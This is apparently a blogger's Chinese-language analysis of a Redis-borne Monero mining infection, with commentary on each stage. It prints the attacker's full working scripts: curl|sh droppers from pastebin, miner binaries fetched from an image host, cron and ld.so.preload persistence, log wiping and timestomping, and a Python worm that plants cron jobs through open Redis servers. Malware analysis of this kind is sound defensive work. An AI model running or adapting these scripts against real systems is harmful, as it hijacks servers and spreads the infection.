起因
这被入侵的机子,就是没有设密码的Redis,被搞了一波。
跟踪记录流水账
阿里云这截图的给出的命令行参数
/bin/sh -c /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh
直接看看这个链接的内容
jane@debian:~$ curl https://pastebin.com/raw/xbY7p5Tb
/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/uuYVPLXd|/usr/bin/base64 -d|/bin/bash
继续跟踪链接
curl https://pastebin.com/raw/uuYVPLXd
省略一堆被base64加密的内容
解密一下
curl https://pastebin.com/raw/uuYVPLXd | base64 -d
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function kills() {
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmrig" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmrigDaemon" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmrigMiner" | awk '{print $2}' | xargs kill -9
pkill -f biosetjenkins
pkill -f AnXqV.yam
pkill -f xmrigDaemon
pkill -f xmrigMiner
pkill -f xmrig
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f bashx
pkill -f bashg
pkill -f bashe
pkill -f bashf
pkill -f bashh
pkill -f XbashY
pkill -f libapache
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json
netstat -anp | grep 69.28.55.86:443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 4444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 14444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 5.196.225.222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
y=$(ps aux | grep -v grep | grep kworkerds | wc -l)
if [ ${y} -eq 0 ]; then
netstat -anp | grep 13531 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
fi
}
function system() {
if [ ! -f "/bin/httpdns" ]; then
curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
if [ ! -f "/bin/httpdns" ]; then
wget https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
fi
sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >>/etc/crontab
fi
}
function top() {
if [ ! -f "/usr/local/lib/libntp.so" ]; then
curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
if [ ! -f "/usr/local/lib/libntp.so" ]; then
wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
fi
fi
if [ ! -f "/etc/ld.so.preload" ]; then
echo /usr/local/lib/libntp.so >/etc/ld.so.preload
else
sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >>/etc/ld.so.preload
fi
touch -acmr /bin/sh /etc/ld.so.preload
touch -acmr /bin/sh /usr/local/lib/libjdk.so
touch -acmr /bin/sh /usr/local/lib/libntp.so
echo 0>/var/spool/mail/root #发邮件
echo 0>/var/log/wtmp #登陆记录
echo 0>/var/log/secure #身份权鉴别记录
echo 0>/var/log/cron #cron消息记录
}
function python() {
nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
touch /tmp/.tmpa
}
function echocron() {
echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /var/spool/cron/crontabs
touch -acmr /bin/sh /var/spool/cron/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
}
function downloadrun() {
ps=$(netstat -anp | grep 13531 | wc -l)
if [ ${ps} -eq 0 ]; then
if [ ! -f "/tmp/kworkerds" ]; then
curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
if [ ! -f "/tmp/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
fi
nohup /tmp/kworkerds >/dev/null 2>&1 &
else
nohup /tmp/kworkerds >/dev/null 2>&1 &
fi
fi
}
function downloadrunxm() {
pm=$(netstat -anp | grep 13531 | wc -l)
if [ ${pm} -eq 0 ]; then
if [ ! -f "/bin/config.json" ]; then
curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
if [ ! -f "/bin/config.json" ]; then
wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
fi
fi
if [ ! -f "/bin/kworkerds" ]; then
curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
if [ ! -f "/bin/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
fi
nohup /bin/kworkerds >/dev/null 2>&1 &
else
nohup /bin/kworkerds >/dev/null 2>&1 &
fi
fi
}
update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)
if [ ${update}x = "update"x ]; then
rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
echocron
else
if [ ! -f "/tmp/.tmpa" ]; then
rm -rf /tmp/.tmp
python
fi
kills
downloadrun
echocron
system
top
sleep 10
port=$(netstat -anp | grep 13531 | wc -l)
if [ ${port} -eq 0 ]; then
downloadrunxm
fi
fi
#
#�
function有点多,用Atom折叠下。
update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)
if [ ${update}x = "update"x ]; then
rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
echocron
else
.
.
.
fi
脚本执行的第一步就是根据update返回值确定是不是要更新。
现在我这个时间点去访问,是noupdate。
curl https://pastebin.com/raw/C4ZhQFrH
noupdate
rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
用脚都能够猜得出这些文件有问题,挖矿脚本需要更新的东西还能是啥子。
看看这个echocron的function干了啥
function echocron() {
echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /var/spool/cron/crontabs
touch -acmr /bin/sh /var/spool/cron/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
}
这个意图就非常之明显啦,添加定时任务到系统里面,让这挖矿生生不息。
留意一下,这个获取脚本的地址,恰好不就是现在分析的这个脚本咩。
/etc/cron.d/root
/var/spool/cron/root
/var/spool/cron/crontabs
/var/spool/cron/crontabs/root
上面的文件还使用touch -acmr改掉了时间,改成跟sh一个时间,怕是防止运维用find找出来吧。
if [ ! -f "/tmp/.tmpa" ]; then
rm -rf /tmp/.tmp
python
fi
判断有没有/tmp/.tmpa,没有就删掉/tmp/.tmp,再调用python这个function。
怀疑.tmp对于apache有较大影响。
function python() {
nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
touch /tmp/.tmpa
}
这个/tmp/.tmpa,应该就是判定有没有运行过这个python脚本的了。
现在看看这个python脚本运行的是啥子
先来个base64解密
#coding: utf-8
import urllib
import base64
d= 'https://pastebin.com/raw/nYBpuAxT'
try:
page=base64.b64decode(urllib.urlopen(d).read())
exec(page)
except:
pass
curl https://pastebin.com/raw/nYBpuAxT | base64 -d
实际上他要运行的脚本就是这个
#! /usr/bin/env python
#coding: utf-8
import threading
import socket
from re import findall
import httplib
IP_LIST = []
class scanner(threading.Thread):
tlist = []
maxthreads = 100
evnt = threading.Event()
lck = threading.Lock()
def __init__(self,host):
threading.Thread.__init__(self)
self.host = host
def run(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((self.host, 6379))
s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
s.send('config set dir /etc/cron.d\r\n')
s.send('config set dbfilename root\r\n')
s.send('save\r\n')
s.close()
except Exception:
pass
scanner.lck.acquire()
scanner.tlist.remove(self)
if len(scanner.tlist) < scanner.maxthreads:
scanner.evnt.set()
scanner.evnt.clear()
scanner.lck.release()
def newthread(host):
scanner.lck.acquire()
sc = scanner(host)
scanner.tlist.append(sc)
scanner.lck.release()
sc.start()
newthread = staticmethod(newthread)
def get_ip_list():
try:
url = 'ident.me'
conn = httplib.HTTPConnection(url, port=80, timeout=10)
req = conn.request(method='GET', url='/', )
result = conn.getresponse()
ip2 = result.read()
ips2 = findall(r'\d+.\d+.', ip2)[0]
for i in range(0, 255):
ip_list1 = (ips2 + (str(i)))
for g in range(0, 255):
IP_LIST.append(ip_list1 + '.' + (str(g)))
except Exception:
pass
def runPortscan():
get_ip_list()
for host in IP_LIST:
scanner.lck.acquire()
if len(scanner.tlist) >= scanner.maxthreads:
scanner.lck.release()
scanner.evnt.wait()
else:
scanner.lck.release()
scanner.newthread(host)
for t in scanner.tlist:
t.join()
if __name__ == "__main__":
runPortscan()
粗略地看了两下,就是一个扫Redis默认端口并且传播挖矿脚本的操作。
这被入侵的机子,就是没有设密码的Redis,被搞了一波。
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((self.host, 6379))
s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
s.send('config set dir /etc/cron.d\r\n')
s.send('config set dbfilename root\r\n')
s.send('save\r\n')
s.close()
url = 'ident.me'
conn = httplib.HTTPConnection(url, port=80, timeout=10)
req = conn.request(method='GET', url='/', )
result = conn.getresponse()
ip2 = result.read()
ips2 = findall(r'\d+.\d+.', ip2)[0]
for i in range(0, 255):
ip_list1 = (ips2 + (str(i)))
for g in range(0, 255):
IP_LIST.append(ip_list1 + '.' + (str(g)))
继续往下看
kills
downloadrun
echocron
system
top
sleep 10
port=$(netstat -anp | grep 13531 | wc -l)
if [ ${port} -eq 0 ]; then
downloadrunxm
fi
看看这个kills的function干了啥
开始的两行就很interesting了,先把同行的挖矿给干了。
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
第一行是干掉sourplum。
第二行是干掉wnTKYg,ddg这个是帮他死掉后重启的。
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
不清楚第一行的删除有什么用,但是涉及到/boot的东西,估计都蛋疼。
后几行都是删掉了apache的备份。
最后一行,a7b104c270,这个是挖矿的。
整个kill的function看下来,都是针对于apache和挖矿恶意程序。
跟这次比较相关就下面这些
rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json
y=$(ps aux | grep -v grep | grep kworkerds | wc -l)
if [ ${y} -eq 0 ]; then
netstat -anp | grep 13531 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
fi
从这几行基本可以判定,kworkerds这就是他的挖矿程序。
要是13531这个端口被占用,又不是这个kworkerds,就kill掉,腾出来给他挖矿用。
把后面遇到的config.json拿到这里来,就很清晰了。
"url": "stratum+tcp://xmr.f2pool.com:13531",
看看这个downloadrun的function干了啥
function downloadrun() {
ps=$(netstat -anp | grep 13531 | wc -l)
if [ ${ps} -eq 0 ]; then
if [ ! -f "/tmp/kworkerds" ]; then
curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
if [ ! -f "/tmp/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
fi
nohup /tmp/kworkerds >/dev/null 2>&1 &
else
nohup /tmp/kworkerds >/dev/null 2>&1 &
fi
fi
}
thyrsi.com,一个图床站。
这里稍微做了下伪装。
把kworkerds下到/tmp,并且运行。
这个下载链接在国内速度真是好差,这可能就是为啥在这次入侵的机子上面找不到这个程序的问题emmm。
但是在海外下载是没有问题的。
root@659b8ee8ecf6:/# chmod 777 kworkerds
root@659b8ee8ecf6:/# ./kworkerds
[2018-09-03 18:31:58] : Autoconf L3 size detected at 3072 KB.
[2018-09-03 18:31:58] : Autoconf core count detected as 2 on Linux.
[2018-09-03 18:31:58] : Starting 1x thread, affinity: 0.
[2018-09-03 18:31:58] : Starting 1x thread, affinity: 1.
[2018-09-03 18:31:59] : Dev pool connected. Logging in...
[2018-09-03 18:32:01] : Pool logged in.
在容器上面跑了一下,确实的一个挖矿的程序。CPU一下子就上天了。
docker diff debian
C /tmp
A /tmp/.systemd-private-23024397a2adb34112feb510f90ad653.service-3vFbca
A /tmp/.systemd-private-45a30b14252fad11672e49bbbda5c08f.service-5qFboa
A /tmp/.systemd-private-763627b1e954c446de5d9b0d2afbfe46.service-xcfboa
A /kworkerds
在输出的文件里面/tmp/.systemd-private-763627b1e954c446de5d9b0d2afbfe46.service-xcfboa
"pool_list" :
[
{"pool_address" : "xmr.f2pool.com:13531",
"wallet_address" : "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.bashx",
"rig_id" : "",
"pool_password" : "",
"use_nicehash" : false,
"use_tls" : false,
"tls_fingerprint" : "",
"pool_weight" : 1
},
],
这个应该是一个已经封装好挖矿程序(挖矿的地址和矿池都写好了),开箱即用。2333
哪怕没有下载后面的config.json都能够跑。
看看这个system的function干了啥
function system() {
if [ ! -f "/bin/httpdns" ]; then
curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
if [ ! -f "/bin/httpdns" ]; then
wget https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
fi
sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >>/etc/crontab
fi
}
先看看这个链接是啥玩儿
curl https://pastebin.com/raw/698D7kZU
/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash
又需要你再获取再解码,他不烦吗?
最后得到下面的内容
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function downloadrun() {
ps=$(netstat -anp | grep 13531 | wc -l)
if [ ${ps} -eq 0 ]; then
if [ ! -f "/tmp/kworkerds" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
if [ ! -f "/tmp/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
fi
nohup /tmp/kworkerds >/dev/null 2>&1 &
else
nohup /tmp/kworkerds >/dev/null 2>&1 &
fi
fi
}
function downloadrunxm() {
pm=$(netstat -anp | grep 13531 | wc -l)
if [ ${pm} -eq 0 ]; then
if [ ! -f "/bin/config.json" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
if [ ! -f "/bin/config.json" ]; then
wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
fi
fi
if [ ! -f "/bin/kworkerds" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
if [ ! -f "/bin/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
fi
nohup /bin/kworkerds >/dev/null 2>&1 &
else
nohup /bin/kworkerds >/dev/null 2>&1 &
fi
fi
}
function init() {
if [ ! -f "/usr/sbin/kworker" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -o /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
if [ ! -f "/usr/sbin/kworker" ]; then
wget http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -O /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
fi
fi
if [ ! -f "/etc/init.d/kworker" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -o /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
if [ ! -f "/etc/init.d/kworker" ]; then
wget http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -O /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
fi
fi
chkconfig --add kworker
}
function echocron() {
echo -e "*/10 * * * * root /usr/bin/curl https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root
}
update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)
if [ ${update}x = "update"x ]; then
rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
echocron
else
downloadrun
init
echocron
sleep 10
port=$(netstat -anp | grep 13531 | wc -l)
if [ ${port} -eq 0 ]; then
downloadrunxm
fi
fi
#
#�
这脚本不得不说,真的有毒。
用sh作为解析器,写函数的时候,前面还加function。
重命名成httpdns丢到bin目录,还给了执行权限。
在crontab里面增加了定时任务。